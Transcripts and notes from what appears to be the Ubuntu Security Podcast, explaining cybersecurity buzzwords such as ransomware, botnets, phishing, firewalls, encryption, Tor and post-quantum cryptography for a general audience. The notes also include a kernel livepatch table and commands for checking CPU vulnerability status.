Give it up to buzzword #9, our last buzzword in the list! Quantum and post quantum security! Let’s finish this off with a big bang, pun intended for the physics lovers out there, and talk about the eerie and wacky thing that is quantum computing. Not really though, because I can definitely assure you that physics is not my jam, and as the name suggests, quantum computing is related to physics and, surprise, surprise, the quantum theory! So…I could say that the next generation of computers will arise in the form of quantum computers, however, it is a little bit more complicated than that, as the quantum computer will be useful to solve a specific set of problems, mainly the ones it was conceptualized to solve. As a bonus, some problems it will be able to solve include a few well known ones which we still can’t efficiently solve with our old regular computers today. However, at the same time problems solved by quantum computers also do not include some of the problems which we already can solve with our old regular computers today. Quantum computers, for example, are not too big on big data, and are limited in their I/O capabilities…so we can keep using regular computers for that. It also wouldn’t be very interesting to use a quantum computer to write blog posts, or create internet memes or even use an app to listen to this awesome podcast: shameless plug. The point is, the quantum computer will not substitute our well known 0s and 1s calculator, it will instead be useful to solve a few sets of complex problems which require small data sets as input and to model quantum systems…hence the name quantum computers. All of that being said, instead of a son of what we know as the current computer, we could see the quantum computer as a young cousin of our well known 64bit friend. Quantum computing, to perform calculations, instead of simply using the regular transistors which represent a 0 or a 1 at a certain point in time, tries to consider the collective properties of quantum states, such as superposition, interference, and entanglement, to obtain results we wouldn’t be able to with the technology we currently have. Wow, so many complicated words in one sentence! I won’t explain any of those today though, sorry about that. However, what I will explain is that instead of bits, quantum computers use qubits. Qubits can have more than just a 0 or 1 state at a given instant, and this state is actually based on probabilities of results you might have for a certain task. When solving a specific problem, a regular computer needs to test all possibilities individually since bits can only have one state at a given time, while a quantum computer, due to the nature of qubits, is able to go down various paths at once since qubits are able to exist in more than one state at a given time. Of course, to extract useful data from such a different base unit, you need to create algorithms that will appropriately use them and extract results from them, so quantum computer algorithms are not the same as our regular and well known 0 and 1 logic gate algorithms. Yes, I know…I explained a lot of stuff without actually explaining it, and unfortunately…I can’t offer you much more. Even scientists say they don’t fully understand quantum theory, so I can assure you that lil’ old me will not be the one to crack that code before them. However, what I can offer you is an explanation of why this has become a CYBER SECURITY buzzword. Out of physics and back into cyber security!
We might not be using quantum computers to write blog posts about quantum computing itself, however, we CAN use quantum computers to easily and quickly solve problems which would kind of render our current cryptographic algorithms useless! So, the current asymmetric cryptographic algorithms that we use are based on mathematical premises which the quantum computer aims to quickly ignore. One example of that is the ever difficult problem of obtaining the prime factors for very large numbers. Being able to factor a number and extract its prime factors might seem like something simple: 6 equals to 2 times 3. 51 equals 3 times 17, 100 equals 2 times 2 times 5 times 5…and so on. Start actually putting in some large numbers over there and then ask yourself the same question: what are the prime factors of 589.450.367.123.907? Now imagine that with a decimal number that has 617 digits. You might want to buy a lot of pens if you plan on doing that by hand, because I can tell you not even your computer can do that in a viable time frame. You will be living your billionth next life when the computer beeps reminding you that one of your past incarnations wanted to crack that key. The point here is, this is a difficult problem to solve and that is why these algorithms are considered safe and are widely used in encryption protocols for various software out there. In come quantum computers and actually make this an easy and quick problem to solve. Yeah…I know what you are thinking…now what? Now my friends, it is time to focus our efforts on developing post-quantum cryptographic algorithms! And there it is, our actual last buzzword! Have you ever heard the saying “if it ain’t broke, don’t fix it”? Well, in this case, it will be broken, repeatedly, so we do need to fix it! We need to find new ways to encrypt our data, and evolve cryptographic algorithms in order to maintain confidentiality of this data when faced with possible future quantum computer attacks. And yes, I know that quantum computers will not be easily accessible to every single person on the planet, at least in the beginning, as I also know that quantum attacks won’t be your everyday script-kiddie daily attack of choice. That does not mean, however, that we shouldn’t be preparing for a reality we are certain will exist in the future. Better safe than sorry. Better still encrypted than sorry!
Well friends, those are the buzzwords I have for you. I created this list based on words I know and am quite tired of seeing everywhere, and also based on suggestions given to me by the Ubuntu Security team! However, I do know that these are not the only ones, and that these will definitely not be the last words we extensively overhear regarding the cyber security world. As we all know, technology is ever changing and ever evolving, and in suit, the buzzwords shall follow. Maybe in a few years you can do a check-in, go back to this episode and see what has changed and how you might see some of these buzzwords in a different light once they have lost their buzz and new queen bees have arrived to torment us in every cyber security advertisement ever! Feel free to share your thoughts and share words I might have missed that you think are cyber security buzzwords in any of our social media channels! I hope you enjoyed this series, for now, I bid you all farewell, and until next time! Bye!
From the deep-web to encryption we decode more cybersecurity buzzwords, plus we cover security updates for Squid, Vim, the Linux kernel, curl and more.
16 unique CVEs addressed
Hello listener! Welcome to part 2 of our cyber security buzzword series! Last episode we talked about ransomware, botnets and phishing attacks! Let’s keep the bees happy and continue on in this buzzing journey of better understanding what is the meaning behind the word and turning the “bzzzzzzzzzz” into an “aaaah, I see” instead! If you haven’t listened to the last episode I highly recommend you do it before you proceed with this one, but hey, that is your choice. I don’t want to take too long with this introduction, so, for those who are already in for this ride, without further ado, let’s jump in! Our first word of today and the fourth overall…we’ve talked about it before, and we are talking about it now once again… buzzword #4 is the one and only firewall! If you listened to the episodes involving the Ubuntu hardening topic, you already know that our dearest friend firewall is one way to keep your network safe because it allows you to filter and possibly block incoming and outgoing traffic in your network. Through use of a firewall you can define that users in your network can’t access a specific website, or you can keep connections coming from a specific IP address from ever being established with these same users. It’s an important job the one done by a firewall, however, it is not 100% hacker proof. A firewall does what it needs to do well, but it won’t save you from yourself, for example, if you decide to become the victim of every phishing campaign happening out there. So…do you see that buzzword right there: “phishing”? That is why I recommended you listen to the last episode, because I explain what is phishing THERE. Moving on, if e-mail service is allowed by the firewall, a hacker can try to get to the network through it, and in that case, my friend, you are the weakest link, as said hacker is expecting you to make the mistake that will allow them passage when the firewall will not do so through other ports or services in the network. Don’t expect a wall to protect your network if your staff is handing out keys to the building’s backdoor to anyone that mentions that they work there!!! I am adding firewalls here on this list because ever since the dawn of time…or at least the dawn of my time…I see the word firewall being thrown around in television shows, in presentations that want to nudge cyber security a little bit, and even on the thoughts of people who are wondering “How did I get infected with malware, I have a firewall!!!”. So…yeah. Unfortunately the buzzword became a universal term used to describe all software and defensive techniques, even if they are not all the same. To make an analogy, a firewall is one fruit amongst the huge selection of different fruits that exist in this beautiful world, but people insist on calling all fruits ‘firewalls’. I am sure you can imagine a situation where I give you a lime and call it an apple, and I am sure that in your imagination you are not too pleased about the result once you bite into that fruit expecting one thing and instead getting another. You might feel a little ‘sour’ should I decide to do such a thing. Haha, get it? Bad jokes aside, it’s important to understand what a firewall really is and what it can actually do for you in terms of protecting your network. Not all attacks are the same, so not all attacks will be stopped by a firewall.
If you go beyond the buzzword and beyond the beautiful wall and fire icon - which at this point could be called a buzzicon - you start to actually build a defense strategy that makes sense and is efficient for your network, one that will include a firewall, BUT will not expect it to defend the network, cook and wash your clothes all at the same time. Therefore, the next time you hear someone in a show mentioning that they have breached 50% of the firewall, remember your training, remember what a firewall actually is, and remember that if you are able to bypass the firewall, you either did it 100% or you simply didn’t, and then relax and laugh a little, because you used your knowledge to actually build a defense strategy such that even if an attacker bypasses the firewall by 100%, you are able to prevent an attack from actually being successful with the help of your other layers of defense. You fought valiantly firewall friend, but not all threats are avoidable by you, and we know that now. We also know now that movie security in movie networks is probably awful, because they seem to only use a firewall to defend very important data, and the firewall is most likely broken, being only 50% bypassed and all…geez, get a grip, Hollywood, or hacking might become TOO easy for those imaginary hackers.
Buzzword #5: encryption…encrypting…encrypted…encrypt. This buzzword is also one that I think can be considered a long-living buzzword. Data encryption suffers from the same problem as firewalls in the sense that people see it as a solution to all of their problems. Oh…and movies also like to use the word a lot. “If my data is encrypted it is completely safe”. Right? Wrong. What is encryption then, and what purpose does it serve? When you encrypt your data, you are actually just encoding it. Transforming it in such a way that whatever information is actually imbued within it cannot be extracted because the data no longer represents something that can be understood by a potential snooper of that data. One encrypted character a day keeps the snooper away, or at least that is the goal anyway. The main purpose of encryption is to maintain data confidentiality, or, in other words, to prevent an unauthorized party from getting access to the data that is going to be encrypted. Therefore, encryption is a technique that will serve the purpose of encoding data in such a way that it loses its meaning to whoever is not authorized to know it. Who are the ones authorized? Those that have the decryption key…and if that key is stolen or shared with someone it shouldn’t be…well then you can say goodbye to your expected confidentiality, as this new someone can now decode the data and interpret it as you would. I guess what annoys me a little bit about this buzzword is the fact that it is used to make people feel completely safe even when the situation does not necessarily guarantee this. The most simple example I can think of is VPNs. I see advertisements for those all the time, and in these advertisements people mention how VPNs will help you stay safe from hackers when you are browsing online…and that is not completely true. It depends on what the hacker is doing. If a hacker is trying to track you and figure out what you are doing in the internet, that is, they are trying to snoop on your browsing activities, then yes, a VPN, which will help you mask your tracks by adding a layer of encryption to your traffic and acting as a middle man in your communication with your destination, will indeed protect you. Think of it as sending an encrypted letter to an intermediary courier. Only you and the courier know the decryption key and so anyone that tries to intercept the letter and does not have this key will be unable to do anything about it. They don’t know who is the actual destination of the letter nor do they know what is the purpose of the letter, all they know is that the courier will receive it and send it to the actual destination. Encryption keeps your communication confidential. Once it gets to the courier, the courier decrypts it and then sends it to the actual destination and your snooper can’t know it is from you because the courier is also sending and receiving data from a bunch of people, and that courier has promised secrecy to you, meaning, it promised it won’t tell others which is your letter. Anyway, now think about the situation where you willingly decide to access a malicious website through a VPN. There is no encryption that will save you from your bad choices here. An encrypted conversation with an attacker is still a conversation with an attacker, and an encrypted malware sent to you through your VPN tunnel will still execute in your machine should you tell it to. So once again I tell you, use encryption but know its purpose! 
It is not because a website is HTTPS, or, in other words, it is not because a website has that little lock in the top left corner, that you are protected from all evil lurking on the internet. All it means is that data you send to that website’s server will be sent to it encrypted. This in turn means that your login credentials won’t be out in the open, being sent in clear text through the network, free to be accessed by anyone that chooses to sniff the data in any point of the path from source to destination. They will be encrypted, and whoever comes across this data in transit won’t be able to know the true contents unless they have the decryption key, which is shared between you and the server only. However, you can decide to send encrypted credentials to an attacker as well. Malicious websites can be HTTPS. In fact, attackers take advantage of the fact that people blindly trust HTTPS websites because they are “encrypted” and make fake HTTPS bank pages in order to steal credentials. Phishing attacks, remember those? So here we have a situation where the buzz in the word is being harmful for those that don’t actually try to understand the meaning behind it. When you want to make sure a website is safe, not only check for the tiny lock in the top-left corner of the browser, also do check if the website’s certificate actually identifies that page as being authentic, as being owned and provided by the entity that you believe it to be. So…yeah. I guess final thoughts on this once again are: encryption is fine when you don’t forget to combine….it with other security measures. I wanted to make a cool rhyme, but that didn’t work out. Oh well…onto the next buzzword!
Buzzword #6: the deep web. Ooooh, spooky! Once again we are in “buzzword because of the movies” territory. Hacker, firewall, encrypted data, network breach, deep web. Oh, and a guy wearing a black hoodie. The cliché buzzword we see getting thrown around every time someone wants to talk about cyber security and sound mysterious while doing it. I mean…I can’t really blame them, as it is human nature to enjoy mysteries and to want to solve them. So, I guess if you are in the entertainment industry, throwing the word “deep web” around is indeed one of the ways to go. However, if you are an IT professional, blindly trusting that what you see in movies is how things actually work is definitely not. Does the deep web contain mysterious websites and crazy mind bending information? Yes. Is it a blackhole where only the most courageous may enter and the most bizarre may stay? No. No! A bunch of the websites you have in the surface web also exist in the deep web! If you want, you can do your regular browsing but using the roads - let’s call them that for now - of the deep web instead. All you have to do is download the software tool that will allow you to access it. The most well known tool to do so is the Tor browser, which will give you access to the Tor network, where lots of deep web websites are hosted. So let’s talk a little bit about the Tor network and try to understand what is the oh-so-mysterious deep web and why you can’t access it by simply typing “Take me to the deep web” on a search engine in your regular browser. Think about the Internet as being the entire planet. Earth as you know it. Everyone and everything we know and can access is inside the planet…and for the smarty pants that will try to say “but what about space travel???”, don’t be a downer and destroy my analogy. Use your imagination and PRETEND like all we know is inside the planet only, which is the ONLY thing we have access to. The planet is like the entire Internet. Now imagine all of the roads on the planet. You can drive through them and go anywhere you want, the same way your data can flow through the Internet and reach several destinations which will provide you with services such as web browsing and e-mail sending. Consider now, however, that a group of servers, or, to stick to the analogy, a group of destinations for road trips, decide to bundle together and create their own underground secret routes and make themselves and their services accessible only to travelers which use those secret routes. The regular roads that would lead you to them are destroyed and there are now a few single regular roads that lead to the entry-points of the underground tunnels. Anyone can enter the underground tunnels if they wish to and use the tunnels to reach those “secret” destinations, as can anyone download a Tor browser and find websites which are deep web or even darknet services. However, if you want to reach your destination you must use the tunnel, and you can no longer use maps to reach this destination, since in the underground tunnels they provide you with no maps as they do in the surface roads. No maps so that the destinations remain well hidden within this secret underground road network, and so that they can “change their location” or “stop existing” whenever they wish to do so. No records means no tracking. When entering the underground tunnels you set up three intermediate tunnel-only destinations that will help you reach your desired end point, let’s consider those toll booths.
The first one is where you will always stop at the beginning of your journey, the second one will connect you to the last one, which in turn will be the one that will finally tell you which road to follow to access the destination which will provide you with the service you wish to access. Think now that these intermediate points recognize you by your car color. A very specific color you and each toll booth attendant have previously decided on, the moment you knew they would be your intermediate stops. So the first point recognizes a red car, the second a blue car, and the last a green car. I am using simple colors here, but to amuse your own imagination, you can think of it as a very specific shade of red that cannot be replicated by anyone else, meaning it will identify you uniquely to that specific toll booth. Same goes to the blue and to the green. Before passing through your underground toll booths you paint your car green, then blue and then red. When you get to the first mark, the toll booth guard recognizes the red hue of your car and identifies you as a valid passenger. It removes the red hue and you tell it your next toll booth stop. It forwards you in that direction, meaning it shows you the way to the blue toll booth. You go to the blue tollbooth and the same thing happens. It recognizes the blue hue, removes it and sees that you are going to the green toll booth, and it directs you there. Finally, when you reach green they do the same, but they finally send you to your final destination. Notice that this allows you to stay anonymous because you got in in a red car and got to your destination in a green colored car. The red toll booth does not know your final tollbooth was green, knowing only you went to blue, and the green does not know your starting point was red, knowing only you came from blue. Blue does not know your starting point nor you final destination, knowing only that you came from red and left for green. Going back to that final destination: your final destination can be outside of the underground tunnels and back on the main roads. You used the underground tunnels just so that people who see you get in through the tunnels in a red car don’t follow you and don’t know where you got out. Your final destination, however, can also be inside the tunnel network. If that is the case, you will never go to the actual destination, because underground tunnel services establish an intermediate rendezvous point for communication and service offering instead of letting you reach them at their actual location. Knowing the secret name of the service, you are able to obtain information on what places are set as these rendezvous points. So…leaving the analogy for a little bit…this is basically what the Tor network is and what at least part of the deep web is. The Tor network is an established network inside the internet. The secret underground roads inside of the planet’s entire road network. It still uses roads, meaning, it still uses IP addresses and establishes communication between devices using regular means in layers under the application layer itself. However, it defines a private communication method within the public internet. Anyone can download a Tor browser and access Tor websites, which would be part of the deep web websites, however, to do so, you need to know the website’s address in the format that will be recognized in the Tor network. 
Unlike the surface web where you register the mapping of your website name and the IP address of the server that will host that website in order for people to be able to find it without having to memorize a complex number to do so - thank you DNS -, in the Tor network what you will know is the name of the onion service and the location where this service meets clients wishing to access it. Tor nodes, our toll booths, can then route you to this destination, where you can introduce yourself to the server and then set a rendezvous point which is where the rest of the communication between you will actually happen. In the Tor network, it is not as simple as the definition of an explicit mapping that says “oh, you want to get to this place? Here is the address!”. Nope. Here, everything is done covertly and secretly. You have a meeting place to define the definitive meeting place. So maybe it is a little bit mysterious after all. I’ll give the movies that. Of course you can use the Tor network, our secret underground tunnels, to access a regular surface web website if you want to. It is not necessary, but a lot of people do it because it allows for anonymous browsing. Our underground tunnels won’t allow for identification of who sent a message that is reaching a specific destination, remember the whole car painting process and the colorful toll booths? Well, in technical terms, Tor uses layers of encryption and intermediate proxy nodes in order to stop someone snooping from knowing who is the original sender of a message arriving at a certain destination. ENCRYPTION being used to assist in keeping anonymity and to maintain confidentiality of the data that is being transferred by whoever is using the Tor network. So yeah…kind of a long explanation, but demystifying it, this is what the deep web is: encryption, intermediary nodes, regular websites, creepy websites, and lots of bureaucracy to get you to your final destination. Oh, wait…that’s just part of it, since Tor is only one of the many underground tunnel networks that exist out there. There are others with different rules, different entry regulations and different functionalities and purposes in general. I decided to tell you about how the most famous one of these secret networks within the network works so that you can get the general iceberg idea of it. However, lady Internet is a vast place, filled with opportunity to create and embed, so secret networks which cannot have their services accessed through the regular WWW URL are plenty out there, all you need is the will and the knowledge of the way to explore it! Oh, and the permission as well. I am not condoning you committing a crime here.
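The “car painting” scheme maps directly onto layered encryption - here is a deliberately toy Python sketch where XOR stands in for real ciphers (real Tor also wraps per-hop routing information, which this omits):
import secrets

def paint(data: bytes, key: bytes) -> bytes:
    return bytes(d ^ k for d, k in zip(data, key))   # toy cipher: one coat of paint

message = b'hello from the tunnels'
hops = ['red', 'blue', 'green']
keys = {h: secrets.token_bytes(len(message)) for h in hops}

onion = message
for hop in reversed(hops):   # the client applies green, then blue, then red
    onion = paint(onion, keys[hop])

for hop in hops:             # each toll booth peels exactly its own colour
    onion = paint(onion, keys[hop])
    print(hop, 'peeled - payload readable?', onion == message)
# only after the final (green) hop is the original message recovered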
Anyway, I think that is enough of me talking for one episode. Tune in for next time where we will talk about our last three buzzwords for this series, which I might add, are three giants…all of them suggested by my Ubuntu Security Team peers of course! Feel free to share your thoughts on today’s episode and buzzwords in any of our social media channels, I would love to hear what you have to say about it! For now, I bid you all farewell and until next time! Bye!
This week Camila dives into the details on some of the most prolific buzzwords flying around the cybersecurity community, plus we cover security updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and more.
58 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 87.1 | 87.2 | 87.1 | — |
aws-5.4 | — | — | 87.1 | — | — |
aws-hwe | — | — | — | 87.2 | — |
azure | — | 87.1 | — | 87.1 | — |
azure-4.15 | — | — | 87.1 | — | — |
azure-5.4 | — | — | 87.1 | — | — |
gcp | 87.1 | 87.1 | — | 87.1 | — |
gcp-4.15 | — | — | 87.1 | — | — |
gcp-5.4 | — | — | 87.1 | — | — |
generic-4.15 | — | — | 87.1 | 87.1 | — |
generic-4.4 | — | — | — | 87.1 | 87.1 |
generic-5.4 | — | 87.1 | 87.1 | — | — |
gke | 87.1 | 87.1 | — | — | — |
gke-4.15 | — | — | 87.1 | — | — |
gke-5.4 | — | — | 87.1 | — | — |
gkeop | — | 87.1 | — | — | — |
gkeop-5.4 | — | — | 87.1 | — | — |
ibm | 87.1 | 87.1 | — | — | — |
linux | 87.1 | — | — | — | — |
lowlatency | 87.1 | — | — | — | — |
lowlatency-4.15 | — | — | 87.1 | 87.1 | — |
lowlatency-4.4 | — | — | — | 87.1 | 87.1 |
lowlatency-5.4 | — | 87.1 | 87.1 | — | — |
oem | — | — | 87.1 | — | — |
canonical-livepatch status
cat /sys/devices/system/cpu/vulnerabilities/mmio_stale_data - reports Not affected, Vulnerable (no mitigation), Vulnerable: Clear CPU buffers attempted, no microcode, or Mitigation: Clear CPU buffers if the mitigation is enabled and the microcode supports it
mmio_stale_data=full # or 'full,nosmt' or 'off'
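For reference, a quick way to see the kernel's verdict for this (and every other) known CPU vulnerability at once - nothing here is specific to MMIO stale data beyond the file name:

```sh
# Print each vulnerability's reported status, one per line, prefixed
# with the sysfs file name so you can see which issue is which
grep . /sys/devices/system/cpu/vulnerabilities/*
```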
kgdb
c_rehash - very similar to CVE-2022-1292 (Episode 159) - possible code execution if running it against certificates with crafted file names - unlikely anyone is doing this in practice, plus upstream say this is deprecated and you should just use openssl rehash instead
Hello listener! Welcome to another segment o’mine in the Ubuntu Security Podcast! It’s been a while, but I have returned to bring some real buzz into today’s episode! How, you might ask? The buzz will come from the buzzwords we will be exploring…cyber security buzzwords to be more specific. Let’s start by defining what a buzzword is, for those who might not know this term: a buzzword is a word - or a term - that, as the name suggests, is currently buzzing. It’s a word that is popular within the scope of its usage. Everyone says it all the time, and it seems like you can’t escape it. The most popular articles about topics in a specific field use it every other sentence, people put them in big, bold and shiny letters right there in the title of their scientific papers, and even your baby’s first words end up being that buzzword because they end up hearing it more than the eternal and classic infant buzz phrase “Say mama!”. A buzzword is, therefore, a fashionable word at a specific point in time. Every field has its own, and cyber security is not exempt from them. Today, I want to explore some of the cyber security buzzwords we have and try to demystify them, as buzzwords can become something much more absurd or grandiose than they actually are just because everyone is choosing to use them. I think we all remember the era of the super low-rise jeans and can agree (or maybe agree to disagree) that just because something is being used by everyone out there, it does not mean it deserves all the hype…of course that is my own opinion on the subject matter that is low-rise jeans. As for the buzzwords, the statement stands! So, let’s bring some of these super duper amazingly popular buzzwords into play here, let’s actually define what they are for the ones out there that might not be cyber-security wizards, and let’s remove the buzzing that these buzzwords might have brought into our minds, shall we?
Buzzword #1: ransomware. Aaah, ransomware. You see this simple and yet deadly word everywhere. “Defend yourself against ransomware!”, “Ransomware might be just around the corner!”, “No need to fear ransomware anymore!”. It was the dawn of 2017 when ransomware became a thing for people outside of the cyber security community because of the infamous WannaCry malware. That picture with a red pop-up window telling you that all of your files had been encrypted and could only be recovered after some type of crypto currency payment was made to the attackers was absolutely everywhere! And after that, the ransomware wave only got stronger, with new and improved types showing up all the time, an honorable mention being the Petya variants. Anyway, since WannaCry was such a big deal at the time, and people were so scared of it after it left behind its trail of mayhem and huge amounts of lost data, ransomware became THE word chosen by various cybersecurity companies to describe that which is your main enemy in the digital world, the supervillain in this installment of the cyber security movie series that is actually our real lives. All defense tools now implement some type of measure against ransomware, because if they don’t, you know that clients of said tool will ask “but what about defending against ransomware?”, because that, my friends, is the buzzword that comes to their minds. Like the word “computer virus” in the early 2000s. Computer viruses still exist, but you don’t see people freaking out about them anymore, because now we have the “antivirus”. Phew, problem solved, right? So no need to have this as a buzzword anymore. However, just like computer viruses existed before the 2000s and still exist to this day, ransomware also existed before WannaCry and much worse versions of it will continue to exist while there still are vulnerabilities and hackers out there, which is to say…probably forever. The only difference is, we now live in a time where people seem to care about it a little bit more, even if they are still not implementing security measures to be safe against it, or at least are not doing it very well. But I am getting ahead of myself here. Let’s first talk about what ransomware really is, which is actually something very simple to do: ransomware is malware, just as a computer virus is also malware. Malware is ‘malicious software’, or, in other words, software that executes on a computing device and that does things that the owner of the device might not want it to do, like…for example, encrypt all of your files and not allow you to access them. That is what ransomware does, in most cases. The main idea is, ransomware is malicious software that will prevent you from accessing your files until you pay some amount of money to the malicious entity that was able to get that ransomware to run in your network devices in the first place…so, until you pay a ransom to the kidnapper of your data. Of course this only works if you have someone on the other side waiting to exchange the money for the key that will decrypt your files, or else, you simply have a very destructive trojan, or worm, or whatever other malware that combines the file encrypting functionality with the ability to spread through the network before actually causing the data harm it does.
The question now is: whatever ransomware-hybrid malware targeted you and your network, the only way to recover the data you lost - the data as it was at the time of total encryption - is to pay the ransom. Should you? Cyber security professionals usually recommend against paying the ransom, as it only shows hackers that they can continue launching ransomware attacks to get what they want. The correct way to keep your files from being forever lost after your network has been infected by one of these nasty pieces of malware is to recover data from the backup server you set up…you did set up a backup server to store the backup for all of your company data, right? I know, I know…it won’t always be the case that people are able to set up backups, and then recovering all that is lost might be a much more difficult task if you decide not to pay the ransom. But come on…we live at a time where cyber security should no longer be left on the bench, and you should be highly concerned about possible attacks, especially attacks related to the ever popular buzzword ransomware. Save some of your budget for backups, you won’t regret it.
Buzzword #2: botnets. ‘Botnet’ is an interesting buzzword because it opens the door to many other tech buzzwords that are in everyone’s minds out there right now…like crypto mining, for example. Why? Because you can use botnets to perform crypto mining…you can also use botnets to spread malware, including ransomware. Oh…and botnets…their participants usually include lots of IoT devices! BAM, another buzzword right there! Now would you look at that! Seems like instead of a buzzword, we actually have a buzzword magnet in our hands, ladies and gentlemen. So…yes, maybe ‘botnet’ is not the hottest buzzword out there right now, but I decided to include it in the list because I feel like it is a disguised buzzword. What do I mean by disguised? It’s the word that is in the subtitle for an article named “CRYPTO MINING HACKER GANG CAUSES DAMAGES TO COMPANY X”, or the word that is implied in a video that is named “IoT DEVICE Y SECURITY VULNERABILITY ONCE AGAIN EXPOSED BY MASSIVE DENIAL OF SERVICE ATTACK”, or even the word that is a part of a title or a conversation about cyber security, cyber attacks and vulnerabilities, but it might not be the one in big bold flashy fonts, as was the case for our dearest friend ransomware. But it all comes back to the botnets eventually. So what is a botnet? As the name suggests, it is a network of bots! Wooow, could I get a round of applause for that definition, please and thank you very much! When we think about a robot, we think about a technological humanoid that speaks in a digitalized voice and obeys commands without question, unless they are actually trying to take over the planet and overthrow human supremacy…but that is a topic for another podcast to maybe discuss. The point here is: what is a computer if not a robot? No, it does not possess humanoid form most of the time, but it does communicate with us through a digital screen and it will execute commands that the software it is running tells it to, this software being created and programmed by a human being. So…yes…robots are computers, computers are robots, or at least…fancy humanoid robots and even cute round cleaning robots need computers to exist and computers are the basis to create a robot. So when we say botnet, we are actually referring to a network of computers. A network of computers, or a group of computers, which are all performing some type of common activity, executing software with the same purpose… and unfortunately for us, in this case it is a malicious purpose. Botnets are created through the infection of computing devices. A hacker releases malware on the Internet and this malware is able to propagate, infecting various devices connected to our fairest of ladies, usually devices that are susceptible to some specific vulnerability. So, yes, once again we have malware being a problem and ruining our days…surprise, surprise. Once infected, the device becomes a robot, a “mindless” soldier in an army of many that will respond to a hacker, most likely the one that created the malware. It connects back to this hacker, usually sending some type of short and sweet - bittersweet for us, that is - message to a command and control server, which we can see as an HQ, but is actually nothing more than an attacker controlled device. And then…it waits.
It continuously calls home to indicate that it is a part of the malicious group of infected devices that are “at the hacker’s service”, and it expects to eventually receive a message that will contain instructions which will give it an attack target and an attack to launch on that target. The malware that is running on the infected device, our bot, will contain the code or will receive and process the code that will allow this attack to be carried out, and then we have a huge amount of possibilities that we can consider for this attack, one of them being: the bots could be instructed to send absurd amounts of data through the network to a specific target. The target device gets overwhelmed and the service it provides through the network can no longer be accessed by legitimate users because the device crashes. This is a denial of service attack, which is very hard to stop at the source, as you have thousands of sources, most of whose owners don’t even have malicious intent. The devices got hacked and are secretly and mercilessly being used to the advantage of the attacker. Granted…the reason for the infection, the presence of the vulnerability that initially caused this could be the owner’s fault. Maybe they wouldn’t have been unwittingly attacking the server of their favorite website had they applied that patch that recently came out for a critical vulnerability, however, you can’t really call them the mastermind of it all when all they did was keep a vulnerable computer, can you? Anyway, I might leave that philosophical question for a later time…for now, another well known use for botnets is crypto mining. Infect, divide and profit! Why use your own computer and your own resources to mine crypto currency when you have hundreds of thousands of unpatched IoT devices at your disposal to mine for you? That’s what the hackers think…not me…just to be veeeery clear. A botnet can also be used to spread ransomware. The bots take care of creating other bots, as well as infecting devices in their own local networks, which might make the hacker a profit from a ransomware attack. And it all ties in beautifully to create the most amazing of buzzword sentences: Phishing campaign allows for creation of ransomware botnet! Oh…wait…there is a buzzword in there we have yet to talk about…
Buzzword #3: phishing! Did you like how I introduced this one by just name-dropping it previously? Since I gave it such a direct introduction, let’s also give it a direct definition. Phishing is a type of social engineering attack where an attacker throws what we can only call the equivalent of “bait” into the Internet “ocean” in hopes of hooking some “fish” on their fishing rods. So…the “fish” are like the victims of the attack, if that wasn’t clear enough for you… Our situation, therefore, is kind of like real fishing, but in a different context, because here we are looking at people getting fooled into clicking on links that will cause them to access malicious websites, and then share sensitive information like passwords and credit card numbers through that website, all because they get fooled into doing it by a very clever attacker who is using their social engineering skills to achieve this. They could also simply get fooled into responding directly to a well crafted message with sensitive information they wouldn’t even share with their own diaries! Or maybe just with their diaries, but not other people. The question which remains is: what is social engineering? To put it simply, a social engineer is someone that knows how to “hack” the human psyche. To put it not so simply, it is the art - can I call it that? - of manipulating other people into doing something they might not want to have done in the first place. So, every spy movie where you see the almighty main character get into a building they shouldn’t by fooling the guard and making them believe they actually work there because they are wearing a fancy suit and spilling out complex terms into a phone…well, that is social engineering. The super spy plays the part and gives no time for the guard to think too much about whether they are actually a legitimate authorized person or not, because when the guard starts questioning it, they emphatically say something along the lines of “Oh my god…I am going to be late to my meeting and you do not want Mr. Whatever to hear about this”. Mr. Whatever is an actual big boss around the place and Mr. Guard worries he will get fired if he doesn’t comply immediately, so just this time, he skips the ID checking phase of the process to let super spy waltz into the building unchallenged. His fear of getting fired was used against him in order to make him do something he wouldn’t do were he thinking clearly, not affected by emotion: skip a part of the identification process of a person wanting to access the building. When we talk about spy movies of course we have a much more interesting example than when we are talking about actual phishing campaigns, but the underlying idea is the same in both. The difference is, in phishing attacks, a hacker will usually send an e-mail or a text message to a bunch of random people with a message that will toy with their emotions somehow. They focus on quantity instead of quality because eventually someone is bound to be freaked out by the email they get saying that their bank account will be closed if they don’t immediately click the link in the message and change their password using the form provided. They click the link without paying attention to the website URL, which is not at all related to that of their bank’s actual website, and are redirected to a webpage which looks exactly like the password changing page you would get had you accessed the legitimate bank website.
They input their data, which is quickly sent to the attacker, who is the actual entity controlling the device behind said website, and now, this attacker has the password to this person’s bank account. Fishing rod: fake email sent to thousands of people saying the bank will close accounts that don’t change their passwords. Bait: the human feeling of desperation one might get when thinking about having their bank account suddenly be inaccessible, caused by the wording and official looking appearance of the email message that was sent. Fish who bite on that bait: people who believe this message and don’t pay too much attention to the signs that indicate that it is fake. Most times, people who are not that tech savvy and don’t even know how it is possible that a fake website could have the same appearance as the one from the actual bank. If it looks like the bank webpage, it can only be the bank webpage…right? So…yes, I am unfortunately talking about all of the grandmas out there, who end up being very common victims of these types of attacks. But do not get me wrong. I am not saying here that if you are not a grandma you are unaffected by phishing attacks. Social engineering techniques go way beyond fear or desperation, and anyone can be a target should a hacker strike the right emotions in their target. Remember a certain Nigerian prince who was asking for a small sum of money only to return 10 times this amount to you as soon as their investment worked? Greed can also be your downfall. So the main tip for those that are worried about falling for phishing scams is simple: if something looks like it is too good to be true, it probably is. Also…if something seems too crazy to be true, maybe ask trustworthy people related to the craziness in question if that message you are receiving is indeed legitimate. So…for our bank situation, call your bank manager! Have more than one information source and breathe before making any hasty decisions and clicking the link that will ask you for your credentials or for any kind of sensitive information for absolutely no reason! I mean…why do you need my credit card number if I am not actually buying anything? Think before you type! That is the best way to not be that sad struggling fish at the mercy of some hook.
Well friends, sadly, we have reached that point of the episode which will actually transform this into a series instead of leaving it as a single episode, since I am unable to write a small script. Oops, sorry about that! We will continue on this journey next week, where I will talk about some other interesting buzzwords you might have heard when out and about. No spoilers though, as it might ruin the fun of it! I await you all in the next episode of this series. For now, feel free to share any of your thoughts on this episode in any of our social media channels! I bid you all farewell and until next time! Bye!
